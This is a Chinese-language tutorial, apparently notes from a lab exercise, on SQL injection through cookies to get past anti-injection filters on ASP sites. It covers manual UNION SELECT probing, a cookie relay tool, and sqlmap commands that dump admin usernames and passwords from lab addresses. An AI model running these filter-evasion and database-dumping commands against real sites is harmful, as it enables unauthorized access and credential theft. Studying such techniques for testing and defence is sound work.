Cookie手工实战注入
目录
注入分为:GET 、POST、COOKIE 注入,当一个站增加了防注入程序之后,
很多朋友都会放弃,其实大家可以试试 COOKIE 注入
先回顾一下 ASP 和 PHP 数据提交方式
ASP
request (全部接受)
request.querystring (接受 get)
request.form (接受 post)
request.cookie(接受 cookie)
PHP
$_REQUEST(全部接受)
$_GET(接受get)
$_POST (接受 post)
$_COOKIE(接受 cookie)
实际操作
通过 burp 抓包分析http://192.168.1.113:999/productshow.asp?id=59
发现 GET 、POST 方式注入都被过滤掉,把 GET 改成 COOKICE注入没有被过滤。
把GET中 ?后面的参数放到cookice中注入
检测加单引号看输出长度是否变化
使用unicon secelet 1-20,猜测字段数目
将可输出的对应数字改为username password
Cookie中转及工具注入
通过注入中转器工具cookie注入
填写信息 进行生成页面 通过get方法实现cookices 注入
只针对asp
最后访问生成出来的 jmcook.asp 文件,记得文件后面接上工具 POST 提交值这栏的参数,
最终打开的地址为:http://localhost:4086/jmCook.asp?jmdcw=58
穿山甲如何cookie注入
选定cookie类型即可
通过 sqlmap 来实现 cookie 注入
D:\VStart50\tools\注入检测\sqlmap>sqlmap.py -u "http://172.16.24.188/productshow.asp" --cookie "id=58" --level 2(level默认1)
末尾加--tables可以查看有哪些表
加--columns -T +表名查看字段
--dump -C "username,password" -T admin
脱库
补充
如果post注入
D:\VStart50\tools\注入检测\sqlmap>sqlmap.py -u "http://172.16.24.188/productshow.asp" --data "id=58"
get 注入
D:\VStart50\tools\注入检测\sqlmap>sqlmap.py -u"http://172.16.24.188/productshow.asp id=58"